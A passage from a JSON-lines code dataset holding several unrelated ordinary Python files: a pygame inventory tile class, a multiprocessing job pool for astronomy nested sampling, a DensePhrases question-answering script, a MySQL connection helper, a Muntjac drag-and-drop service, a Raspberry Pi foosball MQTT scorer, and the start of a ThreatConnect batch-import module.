slot.item == item:\r\n return True\r\n if slot.item is None:\r\n return True\r\n return False\r\n\r\n def read_slot(self, slotnum):\r\n return self.tiles[slotnum].item, self.tiles[slotnum].amount\r\n\r\n\r\nclass Tile(pygame.sprite.Sprite):\r\n def __init__(self, xpos, ypos, item=None, amount=None):\r\n super().__init__()\r\n self.xpos = xpos\r\n self.ypos = ypos\r\n self.image = pygame.Surface((63, 63))\r\n self.image.fill((255, 255, 255))\r\n self.item = item\r\n self.amount = amount\r\n self.ids = ids\r\n self.font = pygame.font.SysFont(\"calibri\", 10)\r\n self.rect = pygame.Rect(xpos, ypos, 65, 65)\r\n\r\n def add_item(self, item, amount):\r\n self.item = item\r\n self.amount = amount\r\n\r\n def draw(self, screen):\r\n screen.blit(self.image, (self.xpos + 1, self.ypos + 1))\r\n if self.item is not None:\r\n screen.blit((self.ids[self.item]), ((self.xpos + 3), (self.ypos + 3)))\r\n screen.blit(self.font.render(str(self.amount), False, (0, 0, 0)), (self.xpos + 5, self.ypos + 50))\r\n\r\n def hotbar_draw(self, screen, pos):\r\n xpos, ypos = pos\r\n screen.blit(self.image, pos)\r\n if self.item is not None:\r\n screen.blit((self.ids[self.item]), ((xpos + 3), (ypos + 3)))\r\n screen.blit(self.font.render(str(self.amount), False, (0, 0, 0)), (xpos + 5, ypos + 50))\r\n","sub_path":"We do no come in peace with classes/Inventory.py","file_name":"Inventory.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"554321826","text":"\"\"\"\nInstead of MPI parallelisation for each pixel, it is [citation needed] faster\nto simply distribute pixels to different processes via pooling. The speedup is\nnot about the actual sampling, but the overheads are only executed once...\n\"\"\"\n\nfrom __future__ import division\nimport sys\nimport time\nimport multiprocessing\nimport subprocess\nfrom collections import OrderedDict\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy import log\n\n\ndef get_log_file_fmatter(log_file=None, prefix='g35-nh3_',\n proj_dir = '~/Projects/g35-vla-nh3/'):\n \"\"\" Backwards compatibility with g35-vla-nh3 repo. \"\"\"\n if log_file is None:\n from os.path import expanduser\n log_dir = expanduser(proj_dir + 'nested-sampling/logs/')\n log_file_fmatter = log_dir + 'g35-nh3_x{}y{}-npeaks{}.log'\n\n return log_file_fmatter\n\n\ndef get_logger(x, y, npeaks, log_file_fmatter=None):\n \"\"\" One log file per pixel to avoid race condition \"\"\"\n if log_file_fmatter is None:\n log_file_fmatter = get_log_file_fmatter()\n log_file = log_file_fmatter.format(x, y, npeaks)\n\n return open(log_file, \"w\")\n\n\ndef work(cmd):\n \"\"\" Hacks around arg-feeding the shell while neatly redirecting stdout \"\"\"\n try:\n _, _, npeaks, y, x, _, perc = cmd.split(' ')\n except ValueError:\n # there's an `echo` command in front of cmd,\n # so we're runnning in `testing=True` mode\n _, _, _, npeaks, y, x, _, perc = cmd.split(' ')\n stdout = get_logger(x, y, npeaks)\n # testing:\n time_string = time.strftime(\"%Y-%m-%d %H:%M\")\n log.info(\"{}: processing (x, y) = ({:2d}, {:2d});\"\n \" {} done\".format(time_string, int(x), int(y), perc))\n\n # hack to get the total number of jobs\n cmd = ' '.join(cmd.split(' ')[:-1])\n\n # execute the worker\n return subprocess.call(cmd.split(' '),\n stdout = stdout,\n shell = False)\n\n\ndef get_xy_sorted(arr, xy_indices=None, cut = None):\n \"\"\"\n Sort xy indices by a value array.\n Adapted from pyspeckit's SpectralCube.py.\n \"\"\"\n if xy_indices is None:\n xy_indices = np.indices(arr.shape)\n yy, xx = xy_indices\n arrsort = np.argsort((1 / (arr - np.nanmin(arr) + .1)).flat)\n\n mask = np.isfinite(arr).flat\n if cut:\n mask = mask & (np.nan_to_num(arr.flat) > cut)\n\n sorted_arr = list(zip(xx.flat[arrsort][mask[arrsort]],\n yy.flat[arrsort][mask[arrsort]]))\n return sorted_arr\n\n\ndef snr_order(line='nh311', snr11=None, snr22=None, **kwargs):\n \"\"\"\n Was written for an ammonia cube data, have yet to generalize.\n \"\"\"\n if snr11 is None or snr22 is None:\n snr11, snr22 = get_vla_snr()\n line_to_snr = {'nh311': snr11, 'nh322': snr22}\n\n return get_xy_sorted(line_to_snr[line], np.indices(snr11.shape), **kwargs)\n\n\ndef bayes_factor_order(kfile='Ks.fits', idx=0, **kwargs):\n K = fits.getdata(kfile)[idx]\n\n return get_xy_sorted(K, np.indices(K.shape), **kwargs)\n\n\ndef get_vla_snr():\n \"\"\"\n Backwards compatibility with the g35-vla-nh3 repo.\n \"\"\"\n from opencube import make_cube_shh\n cubes = make_cube_shh() # comes with pregen snr attributes...\n snrmap11, snrmap22 = cubes.snr11, cubes.snr22\n\n return snrmap11, snrmap22\n\n\ndef xy_sorted_by(method='Bfactor', **kwargs):\n \"\"\"\n Returns xy indices sorted according to a given method.\n Additional keyword arguments are passed to the method f-ions.\n \"\"\"\n method_to_func = {'Bfactor': bayes_factor_order,\n 'snr' : snr_order }\n\n return method_to_func[method](**kwargs)\n\ndef perc(i, n_jobs, n_cpu, split=False):\n if split:\n jobs_per_cpu = n_jobs / n_cpu\n p = (i % jobs_per_cpu) / jobs_per_cpu * 100\n else:\n p = i / n_jobs * 100\n return \"%{:.2f}\".format(p)\n\ndef get_tasks(n_cpu, npeaks=1, method='Bfactor', testing=False,\n script=\"innocent_script.py\", xy_order=None, **kwargs):\n if xy_order is None:\n xy_order = xy_sorted_by(method, **kwargs)\n\n prefix = 'echo ' if testing else ''\n\n cmd_string = (\"{}python{} {} {} \".format(prefix, sys.version_info.major,\n script, npeaks) + \"{} {} 0 {}\")\n n_jobs = len(xy_order)\n tasks = [cmd_string.format(y, x, perc(i, n_jobs, n_cpu))\n for i, (x, y) in enumerate(xy_order)]\n\n return tasks\n\ndef try_get_args(n, fallback, forcetype=str):\n try:\n # sys.argv[0] is some env executable path...\n arg = forcetype(sys.argv[n+1])\n except IndexError:\n arg = fallback\n\n return arg\n\n\nif __name__ == '__main__':\n \"\"\" Example run, custom-tailored to the VLA data on G035.39. \"\"\"\n # NOTE: normal dict would mess up the order of the arguments\n default_args = OrderedDict([('npeaks', 1), ('method', \"snr\"), ('cut', 8),\n ('n_cpu', 7)])\n\n runtime_args = {}\n for i, (argname, argval) in enumerate(default_args.items()):\n runtime_args[argname] = try_get_args(i, argval, type(argval))\n\n method = runtime_args.pop('method')\n n_cpu = runtime_args.pop('n_cpu')\n if method == 'snr':\n line = 'nh322'\n snrmap11, snrmap22 = get_vla_snr()\n\n tasklist_kwargs=dict(n_cpu=n_cpu, method='snr', line=line,\n snr11=snrmap11, snr22=snrmap22)\n\n if method == 'Bfactor':\n # TODO FIXME:\n raise NotImplementedError\n\n tasklist_kwargs.update(runtime_args)\n\n tasks = get_tasks(**tasklist_kwargs)\n\n pool = multiprocessing.Pool(processes=n_cpu)\n pool.map(work, tasks)\n\n\ndef testing_K_sort(Kfile='Ks.fits', index=0, debug=False):\n if debug:\n log.setLevel('DEBUG')\n\n K_vals = fits.getdata(Kfile)[index]\n K_new = np.inf\n\n tasks = get_tasks(method='Bfactor', npeaks=1, cut=20)\n for job in tasks:\n _, _, npeaks, y, x, _, p = job.split(' ')\n x, y = int(x), int(y)\n K_new, K_old = K_vals[y, x], K_new\n\n assert K_old > K_new\n\n log.debug(\"K = {:7.2f} at (x, y) = ({:2d}, \"\n \"{:2d}), {} done\".format(K_new, x, y, p))\n\n\ndef testing_snr_sort(snrmap11=None, snrmap22=None, debug=False,\n cut=5, line='nh311', n_cpu=7, run=False):\n \"\"\"\n Assures that the S/N ordering is being executed properly.\n Was written for an ammonia cube data, have yet to generalize.\n \"\"\"\n if debug:\n log.setLevel('DEBUG')\n\n if snrmap11 is None and snrmap22 is None:\n snrmap11, snrmap22 = get_vla_snr()\n\n snr, snr_prev = {}, {'nh311': np.inf, 'nh322': np.inf}\n tasks_by_snr = get_tasks(n_cpu=n_cpu, method='snr', cut=cut, line=line,\n snr11=snrmap11, snr22=snrmap22, testing=True)\n for job in tasks_by_snr:\n _, _, _, npeaks, y, x, _, p = job.split(' ')\n x, y = int(x), int(y)\n snr['nh311'], snr['nh322'] = snrmap11[y, x], snrmap22[y, x]\n\n # make sure the snr job list progresses downwards\n assert snr[line] <= snr_prev[line]\n\n log.debug(\"S/R @ NH3 (1,1) = {:.2f}, \"\n \"S/R @ NH3 (2,2) = {:.2f} at (x, y) = \"\n \"({:2d}, {:2d}), {} done\".format(snr['nh311'], snr['nh322'],\n x, y, p))\n\n # used later for recurrent relation reasons...\n snr_prev['nh311'], snr_prev['nh322'] = snr['nh311'], snr['nh322']\n\n if run:\n pool = multiprocessing.Pool(processes=n_cpu)\n pool.map(work, tasks_by_snr)\n","sub_path":"pyspecnest/pool_multinest.py","file_name":"pool_multinest.py","file_ext":"py","file_size_in_byte":7491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"58129870","text":"import json\nimport argparse\nimport torch\nimport os\nimport random\nimport numpy as np\nimport requests\nimport logging\nimport math\nimport copy\nimport string\nimport faiss\n\nfrom time import time\nfrom tqdm import tqdm\n\nfrom densephrases.utils.open_utils import load_query_encoder, load_phrase_index, get_query2vec, load_qa_pairs\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\ndef embed_query(question, args, query_encoder, tokenizer, batch_size=1):\n query2vec = get_query2vec(\n query_encoder=query_encoder, tokenizer=tokenizer, args=args, batch_size=batch_size\n )\n all_outs = []\n for q_idx in tqdm(range(0, len(question), batch_size)):\n print(question[q_idx:q_idx+batch_size])\n outs = query2vec(question[q_idx:q_idx+batch_size])\n all_outs += outs\n start = np.concatenate([out[0] for out in all_outs], 0)\n end = np.concatenate([out[1] for out in all_outs], 0)\n query_vec = np.concatenate([start, end], 1)\n #logger.info(f'Query reps: {query_vec.shape}')\n return query_vec\n\ndef evaluate(question, args, mips=None, query_encoder=None, tokenizer=None):\n # Load dataset and encode queries\n if query_encoder is None:\n print(f'Query encoder will be loaded from {args.query_encoder_path}')\n device = 'cuda' if args.cuda else 'cpu'\n query_encoder, tokenizer = load_query_encoder(device, args)\n query_vec = embed_query(question, args, query_encoder, tokenizer)\n\n # Load MIPS\n if mips is None:\n mips = load_phrase_index(args)\n\n # Search\n step = 1\n #logger.info(f'Aggergation strategy used: {args.agg_strat}')\n predictions = []\n evidences = []\n titles = []\n scores = []\n se_poss = []\n for q_idx in tqdm(range(0, len(question), step)):\n result = mips.search(\n query_vec[q_idx:q_idx+step],\n q_texts=question[q_idx:q_idx+step], nprobe=args.nprobe,\n top_k=args.top_k, max_answer_length=args.max_answer_length,\n aggregate=args.aggregate, agg_strat=args.agg_strat,\n )\n prediction = [[ret['answer'] for ret in out] if len(out) > 0 else [''] for out in result]\n evidence = [[ret['context'] for ret in out] if len(out) > 0 else [''] for out in result]\n title = [[ret['title'] for ret in out] if len(out) > 0 else [['']] for out in result]\n score = [[ret['score'] for ret in out] if len(out) > 0 else [-1e10] for out in result]\n se_pos = [[(ret['start_pos'], ret['end_pos']) for ret in out] if len(out) > 0 else [(0,0)] for out in result]\n predictions += prediction\n evidences += evidence\n titles += title\n scores += score\n se_poss += se_pos\n\n pred_out = {\n 'question': question[0],\n 'prediction': predictions[0], 'score': scores[0], 'title': titles[0],\n 'evidence': evidences[0] if evidences is not None else '',\n }\n with open(args.question_test_out, 'w') as f:\n json.dump(pred_out, f)\n \n return prediction\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n # QueryEncoder\n parser.add_argument('--model_type', default='bert', type=str)\n parser.add_argument(\"--pretrained_name_or_path\", default='SpanBERT/spanbert-base-cased', type=str)\n parser.add_argument(\"--config_name\", default=\"\", type=str)\n parser.add_argument(\"--tokenizer_name\", default=\"\", type=str)\n parser.add_argument(\"--do_lower_case\", default=False, action='store_true')\n parser.add_argument('--max_query_length', default=64, type=int)\n parser.add_argument(\"--cache_dir\", default=None, type=str)\n parser.add_argument(\"--query_encoder_path\", default='', type=str)\n parser.add_argument(\"--query_port\", default='-1', type=str)\n\n # PhraseIndex\n parser.add_argument('--dump_dir', default='dump')\n parser.add_argument('--phrase_dir', default='phrase')\n parser.add_argument('--index_dir', default='256_flat_SQ4')\n parser.add_argument('--index_name', default='index.faiss')\n parser.add_argument('--idx2id_name', default='idx2id.hdf5')\n parser.add_argument('--index_port', default='-1', type=str)\n\n # These can be dynamically changed.\n parser.add_argument('--max_answer_length', default=10, type=int)\n parser.add_argument('--top_k', default=10, type=int)\n parser.add_argument('--nprobe', default=256, type=int)\n parser.add_argument('--aggregate', default=False, action='store_true')\n parser.add_argument('--agg_strat', default='opt1', type=str)\n parser.add_argument('--truecase', default=False, action='store_true')\n parser.add_argument(\"--truecase_path\", default='truecase/english_with_questions.dist', type=str)\n\n # Run mode\n parser.add_argument('--run_mode', default='eval')\n parser.add_argument('--cuda', default=False, action='store_true')\n parser.add_argument('--draft', default=False, action='store_true')\n parser.add_argument('--debug', default=False, action='store_true')\n parser.add_argument('--save_pred', default=False, action='store_true')\n parser.add_argument('--seed', default=1992, type=int)\n\n #query encoder for step1\n parser.add_argument('--question_test_out', default='sample/step1_question_test_out.json')\n\n args = parser.parse_args()\n\n question = input(\"just input what you want to ask (relevant to the sample articles) : \\n\")\n predictions = evaluate([question], args)\n print()\n print(\"############### Answer: ################\")\n print(predictions[0][0])","sub_path":"step1_test_with_question.py","file_name":"step1_test_with_question.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3818659","text":"'''\n@author:KongWeiKun\n@file: data.py\n@time: 18-4-20 下午1:50\n@contact: kongwiki@163.com\n'''\nimport pymysql\n\ndef cursors():\n host='localhost'\n user='...'\n pwd='...'\n db='...'\n con=pymysql.connect(host,user,pwd,db,use_unicode=True, charset=\"utf8\")#防止编码问题\n # con.set_charset('utf8')\n cursor=con.cursor()\n con.autocommit(True)#自动提交\n #防止中文乱码\n cursor.execute('SET NAMES utf8;')\n cursor.execute('SET CHARACTER SET utf8;')\n cursor.execute('SET character_set_connection=utf8;')\n return cursor","sub_path":"sql/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"633057741","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/muntjac/terminal/gwt/server/drag_and_drop_service.py\n# Compiled at: 2013-04-04 15:36:36\nimport logging\nfrom muntjac.event.dd.target_details_impl import TargetDetailsImpl\nfrom muntjac.terminal.variable_owner import IVariableOwner\nfrom muntjac.terminal.gwt.server.json_paint_target import JsonPaintTarget\nfrom muntjac.event.dd.drag_and_drop_event import DragAndDropEvent\nfrom muntjac.event.transferable_impl import TransferableImpl\nfrom muntjac.event.dd.drop_target import IDropTarget\nfrom muntjac.event.dd.drag_source import IDragSource\nfrom muntjac.terminal.gwt.client.ui.dd.v_drag_and_drop_manager import DragEventType\nlogger = logging.getLogger(__name__)\n\nclass DragAndDropService(IVariableOwner):\n\n def __init__(self, manager):\n self._manager = manager\n self._lastVisitId = None\n self._lastVisitAccepted = False\n self._dragEvent = None\n self._acceptCriterion = None\n return\n\n def changeVariables(self, source, variables):\n owner = variables.get('dhowner')\n if not isinstance(owner, IDropTarget):\n logger.critical('DropHandler owner ' + owner + ' must implement IDropTarget')\n return\n dropTarget = owner\n self._lastVisitId = variables.get('visitId')\n dropRequest = self.isDropRequest(variables)\n if dropRequest:\n self.handleDropRequest(dropTarget, variables)\n else:\n self.handleDragRequest(dropTarget, variables)\n\n def handleDropRequest(self, dropTarget, variables):\n \"\"\"Handles a drop request from the VDragAndDropManager.\n \"\"\"\n dropHandler = dropTarget.getDropHandler()\n if dropHandler is None:\n logger.info('IDropTarget.getDropHandler() returned null for owner: ' + dropTarget)\n return\n else:\n transferable = self.constructTransferable(dropTarget, variables)\n dropData = self.constructDragDropDetails(dropTarget, variables)\n dropEvent = DragAndDropEvent(transferable, dropData)\n if dropHandler.getAcceptCriterion().accept(dropEvent):\n dropHandler.drop(dropEvent)\n return\n\n def handleDragRequest(self, dropTarget, variables):\n \"\"\"Handles a drag/move request from the VDragAndDropManager.\n \"\"\"\n self._lastVisitId = variables.get('visitId')\n self._acceptCriterion = dropTarget.getDropHandler().getAcceptCriterion()\n transferable = self.constructTransferable(dropTarget, variables)\n dragDropDetails = self.constructDragDropDetails(dropTarget, variables)\n self._dragEvent = DragAndDropEvent(transferable, dragDropDetails)\n self._lastVisitAccepted = self._acceptCriterion.accept(self._dragEvent)\n\n def constructDragDropDetails(self, dropTarget, variables):\n \"\"\"Construct DragDropDetails based on variables from client drop\n target. Uses DragDropDetailsTranslator if available, otherwise a\n default DragDropDetails implementation is used.\n \"\"\"\n rawDragDropDetails = variables.get('evt')\n dropData = dropTarget.translateDropTargetDetails(rawDragDropDetails)\n if dropData is None:\n dropData = TargetDetailsImpl(rawDragDropDetails, dropTarget)\n return dropData\n\n def isDropRequest(self, variables):\n return self.getRequestType(variables) == DragEventType.DROP\n\n def getRequestType(self, variables):\n typ = int(variables.get('type'))\n return DragEventType.values()[typ]\n\n def constructTransferable(self, dropHandlerOwner, variables):\n sourceComponent = variables.get('component')\n variables = variables.get('tra')\n transferable = None\n if sourceComponent is not None and isinstance(sourceComponent, IDragSource):\n transferable = sourceComponent.getTransferable(variables)\n if transferable is None:\n transferable = TransferableImpl(sourceComponent, variables)\n return transferable\n\n def isEnabled(self):\n return True\n\n def isImmediate(self):\n return True\n\n def printJSONResponse(self, outWriter):\n if self._isDirty():\n outWriter.write(', \"dd\":')\n jsonPaintTarget = JsonPaintTarget(self._manager, outWriter, False)\n jsonPaintTarget.startTag('dd')\n jsonPaintTarget.addAttribute('visitId', self._lastVisitId)\n if self._acceptCriterion is not None:\n jsonPaintTarget.addAttribute('accepted', self._lastVisitAccepted)\n self._acceptCriterion.paintResponse(jsonPaintTarget)\n jsonPaintTarget.endTag('dd')\n jsonPaintTarget.close()\n self._lastVisitId = -1\n self._lastVisitAccepted = False\n self._acceptCriterion = None\n self._dragEvent = None\n return\n\n def _isDirty(self):\n if self._lastVisitId > 0:\n return True\n return False","sub_path":"pycfiles/Muntjac-1.1.2-py2.7/drag_and_drop_service.py","file_name":"drag_and_drop_service.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498078819","text":"import RPi.GPIO as GPIO\nimport json\nimport paho.mqtt.client as mqtt\nimport time\nimport asyncio\n\nthread = None\n\nscore_topic = \"foosball/score\"\nspeed_topic = \"foosball/speed\"\n\n# 192.168.195.7 was IR 829 Broker\nbroker_ip = \"10.8.182.131\" # <--- Please change IP to match the location of your MQTT broker\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\nir = 15\nir2 = 18\n\nmqttc = mqtt.Client()\nmqttc.connect(broker_ip)\nmqttc.loop_start()\n\nGPIO.setup(ir, GPIO.IN, GPIO.PUD_UP)\nGPIO.setup(ir2, GPIO.IN, GPIO.PUD_DOWN)\n\nstart = 0\nstop = 0\n\n\nasync def data_collect_ir():\n GPIO.add_event_detect(ir, GPIO.BOTH, callback=process_edge, bouncetime=5)\n\n\ndef process_edge(channel):\n if GPIO.input(channel): # test if pin is high\n post_speed(channel)\n else:\n post_score(channel)\n\n\ndef post_score(channel):\n global start\n start = time.time()\n print(\"Start time is:\")\n print(start)\n brokerMessage = {'Status': 'scored', 'Player': '2', 'Score': 1, 'Data': '0'}\n print(\"message sent\")\n mqttc.publish(score_topic, json.dumps(brokerMessage))\n\n\ndef post_speed(channel):\n global stop\n stop = time.time()\n print(\"Stop time is:\")\n print(stop)\n if stop > start:\n elapsed = stop - start\n print(\"Elapsed time is:\")\n print(elapsed)\n speed = .0345 / elapsed # meters per second\n mph = 2.23694 * speed # convert meters/s to mph\n print(\"posting speed\")\n print(mph)\n brokerMessage = {'Status': 'speed', 'Speed': mph}\n mqttc.publish(speed_topic, json.dumps(brokerMessage))\n\n\nif __name__ == '__main__':\n # data_collect()\n loop = asyncio.get_event_loop()\n # tasks = [asyncio.ensure_future(data_collect_ir()), asyncio.ensure_future(data_collect_ir2())]\n tasks = [asyncio.get_event_loop().run_until_complete(data_collect_ir())]\n loop.run_forever()\n print(\"started\")\n ","sub_path":"player2.py","file_name":"player2.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159312958","text":"\"\"\"ThreatConnect Batch Import Module.\"\"\"\n# standard library\nimport hashlib\nimport json\nimport math\nimport os\nimport re\nimport shelve\nimport time\nimport uuid\nfrom collections import deque\nfrom typing import Optional\n\nfrom .group import (\n Adversary,\n Campaign,\n Document,\n Email,\n Event,\n Group,\n Incident,\n IntrusionSet,\n Report,\n Signature,\n Threat,\n)\nfrom .indicator import (\n ASN,\n CIDR,\n URL,\n Address,\n EmailAddress,\n File,\n Host,\n Indicator,\n Mutex,\n RegistryKey,\n UserAgent,\n custom_indicator_class_factory,\n)\n\n# import local modules for dynamic reference\nmodule = __import__(__name__)\n\n\nclass Batch:\n \"\"\"ThreatConnect Batch Import Module\n\n Args:\n tcex (obj): An instance of TcEx object.\n owner (str): The ThreatConnect owner for Batch action.\n action (str, default:Create): Action for the batch job ['Create', 'Delete'].\n attribute_write_type (str, default:Replace): Write type for Indicator attributes\n ['Append', 'Replace'].\n halt_on_error (bool, default:True): If True any batch error will halt the batch job.\n \"\"\"\n\n def __init__(\n self,\n tcex,\n owner,\n action=None,\n attribute_write_type=None,\n halt_on_error=True,\n playbook_triggers_enabled=None,\n ):\n \"\"\"Initialize Class properties.\"\"\"\n self.tcex = tcex\n self._action = action or 'Create'\n self._attribute_write_type = attribute_write_type or 'Replace'\n self._batch_max_chunk = 5000\n self._halt_on_error = halt_on_error\n self._hash_collision_mode = None\n self._file_merge_mode = None\n self._owner = owner\n self._playbook_triggers_enabled = playbook_triggers_enabled\n\n # shelf settings\n self._group_shelf_fqfn = None\n self._indicator_shelf_fqfn = None\n\n # global overrides on batch/file errors\n self._halt_on_batch_error = None\n self._halt_on_file_error = None\n self._halt_on_poll_error = None\n\n # debug/saved flags\n self._saved_xids = None\n self._saved_groups = None # indicates groups shelf file was provided\n self._saved_indicators = None # indicates indicators shelf file was provided\n self.enable_saved_file = False\n\n # default properties\n self._batch_data_count = None\n self._poll_interval = None\n self._poll_interval_times = []\n self._poll_timeout = 3600\n\n # containers\n self._files = {}\n self._groups = None\n self._groups_shelf = None\n self._indicators = None\n self._indicators_shelf = None\n\n # build custom indicator classes\n self._gen_indicator_class()\n\n @property\n def _critical_failures(self): # pragma: no cover\n \"\"\"Return Batch critical failure messages.\"\"\"\n return [\n 'Encountered an unexpected Exception while processing batch job',\n 'would exceed the number of allowed indicators',\n ]\n\n def _gen_indicator_class(self): # pragma: no cover\n \"\"\"Generate Custom Indicator Classes.\"\"\"\n\n for entry in self.tcex.indicator_types_data.values():\n name = entry.get('name')\n class_name = name.replace(' ', '')\n # temp fix for API issue where boolean are returned as strings\n entry['custom'] = self.tcex.utils.to_bool(entry.get('custom'))\n\n if class_name in globals():\n # skip Indicator Type if a class already exists\n continue\n\n # Custom Indicator can have 3 values. Only add the value if it is set.\n value_fields = []\n if entry.get('value1Label'):\n value_fields.append(entry['value1Label'])\n if entry.get('value2Label'):\n value_fields.append(entry['value2Label'])\n if entry.get('value3Label'):\n value_fields.append(entry['value3Label'])\n value_count = len(value_fields)\n\n class_data = {}\n # Add Class for each Custom Indicator type to this module\n custom_class = custom_indicator_class_factory(name, Indicator, class_data, value_fields)\n setattr(module, class_name, custom_class)\n\n # Add Custom Indicator Method\n self._gen_indicator_method(name, custom_class, value_count)\n\n def _gen_indicator_method(self, name, custom_class, value_count): # pragma: no cover\n \"\"\"Dynamically generate custom Indicator methods.\n\n Args:\n name (str): The name of the method.\n custom_class (object): The class to add.\n value_count (int): The number of value parameters to support.\n \"\"\"\n method_name = name.replace(' ', '_').lower()\n\n # Add Method for each Custom Indicator class\n def method_1(value1, xid, **kwargs): # pylint: disable=possibly-unused-variable\n \"\"\"Add Custom Indicator data to Batch object\"\"\"\n indicator_obj = custom_class(value1, xid, **kwargs)\n return self._indicator(indicator_obj)\n\n def method_2(value1, value2, xid, **kwargs): # pylint: disable=possibly-unused-variable\n \"\"\"Add Custom Indicator data to Batch object\"\"\"\n indicator_obj = custom_class(value1, value2, xid, **kwargs)\n return self._indicator(indicator_obj)\n\n def method_3(\n value1, value2, value3, xid, **kwargs\n ): # pylint: disable=possibly-unused-variable\n \"\"\"Add Custom Indicator data to Batch object\"\"\"\n indicator_obj = custom_class(value1, value2, value3, xid, **kwargs)\n return self._indicator(indicator_obj)\n\n method = locals()[f'method_{value_count}']\n setattr(self, method_name, method)\n\n def _group(self, group_data):\n \"\"\"Return previously stored group or new group.\n\n Args:\n group_data (dict|obj): An Group dict or instance of Group object.\n\n Returns:\n dict|obj: The new Group dict/object or the previously stored dict/object.\n \"\"\"\n if isinstance(group_data, dict):\n # get xid from dict\n xid = group_data.get('xid')\n else:\n # get xid from object\n xid = group_data.xid\n\n if self.groups.get(xid) is not None:\n # return existing group from memory\n group_data = self.groups.get(xid)\n elif self.groups_shelf.get(xid) is not None:\n # return existing group from shelf\n group_data = self.groups_shelf.get(xid)\n else:\n # store new group\n self.groups[xid] = group_data\n return group_data\n\n def _indicator(self, indicator_data):\n \"\"\"Return previously stored indicator or new indicator.\n\n Args:\n indicator_data (dict|obj): An Indicator dict or instance of Indicator object.\n\n Returns:\n dict|obj: The new Indicator dict/object or the previously stored dict/object.\n\n \"\"\"\n if isinstance(indicator_data, dict):\n # get xid from dict\n xid = indicator_data.get('xid')\n else:\n # get xid from object\n xid = indicator_data.xid\n\n if self.indicators.get(xid) is not None:\n # return existing indicator from memory\n indicator_data = self.indicators.get(xid)\n elif self.indicators_shelf.get(xid) is not None:\n # return existing indicator from shelf\n indicator_data = self.indicators_shelf.get(xid)\n else:\n # store new indicators\n self.indicators[xid] = indicator_data\n return indicator_data\n\n @staticmethod\n def _indicator_values(indicator):\n \"\"\"Process indicators expanding file hashes/custom indicators into multiple entries.\n\n Args:\n indicator (str): \" : \" delimited string\n\n Returns:\n list: The list of indicators split on \" : \".\n \"\"\"\n indicator_list = [indicator]\n if indicator.count(' : ') > 0:\n # handle all multi-valued indicators types (file hashes and custom indicators)\n indicator_list = []\n\n # group 1 - lazy capture everything to first : or end of line\n iregx_pattern = r'^(.*?(?=\\s\\:\\s|$))?'\n iregx_pattern += r'(?:\\s\\:\\s)?' # remove :\n # group 2 - look behind for :, lazy capture everything\n # to look ahead (optional ): or end of line\n iregx_pattern += r'((?<=\\s\\:\\s).*?(?=(?:\\s)?\\:\\s|$))?'\n iregx_pattern += r'(?:(?:\\s)?\\:\\s)?' # remove (optional ):\n # group 3 - look behind for :, lazy capture everything\n # to look ahead end of line\n iregx_pattern += r'((?<=\\s\\:\\s).*?(?=$))?$'\n iregx = re.compile(iregx_pattern)\n\n indicators = iregx.search(indicator)\n if indicators is not None:\n indicator_list = list(indicators.groups())\n\n return indicator_list\n\n @property\n def action(self):\n \"\"\"Return batch action.\"\"\"\n return self._action\n\n @action.setter\n def action(self, action):\n \"\"\"Set batch action.\"\"\"\n self._action = action\n\n def add_group(self, group_data):\n \"\"\"Add a group to Batch Job.\n\n .. code-block:: javascript\n\n {\n \"name\": \"Example Incident\",\n \"type\": \"Incident\",\n \"attribute\": [{\n \"type\": \"Description\",\n \"displayed\": false,\n \"value\": \"Example Description\"\n }],\n \"xid\": \"e336e2dd-5dfb-48cd-a33a-f8809e83e904\",\n \"associatedGroupXid\": [\n \"e336e2dd-5dfb-48cd-a33a-f8809e83e904:58\",\n ],\n \"tag\": [{\n \"name\": \"China\"\n }]\n }\n\n Args:\n group_data (dict): The full Group data including attributes, labels, tags, and\n associations.\n \"\"\"\n return self._group(group_data)\n\n def add_indicator(self, indicator_data):\n \"\"\"Add an indicator to Batch Job.\n\n .. code-block:: javascript\n\n {\n \"type\": \"File\",\n \"rating\": 5.00,\n \"confidence\": 50,\n \"summary\": \"53c3609411c83f363e051d455ade78a7\n : 57a49b478310e4313c54c0fee46e4d70a73dd580\n : db31cb2a748b7e0046d8c97a32a7eb4efde32a0593e5dbd58e07a3b4ae6bf3d7\",\n \"associatedGroups\": [\n {\n \"groupXid\": \"e336e2dd-5dfb-48cd-a33a-f8809e83e904\"\n }\n ],\n \"attribute\": [{\n \"type\": \"Source\",\n \"displayed\": true,\n \"value\": \"Malware Analysis provided by external AMA.\"\n }],\n \"fileOccurrence\": [{\n \"fileName\": \"drop1.exe\",\n \"date\": \"2017-03-03T18:00:00-06:00\"\n }],\n \"tag\": [{\n \"name\": \"China\"\n }],\n \"xid\": \"e336e2dd-5dfb-48cd-a33a-f8809e83e904:170139\"\n }\n\n Args:\n indicator_data (dict): The Full Indicator data including attributes, labels, tags,\n and associations.\n \"\"\"\n if indicator_data.get('type') not in ['Address', 'EmailAddress', 'File', 'Host', 'URL']:\n # for custom indicator types the valueX fields are required.\n # using the summary we can build the values\n index = 1\n for value in self._indicator_values(indicator_data.get('summary')):\n indicator_data[f'value{index}'] = value\n index += 1\n if indicator_data.get('type') == 'File':\n # convert custom field name to the appropriate value for batch v2\n size = indicator_data.pop('size', None)\n if size is not 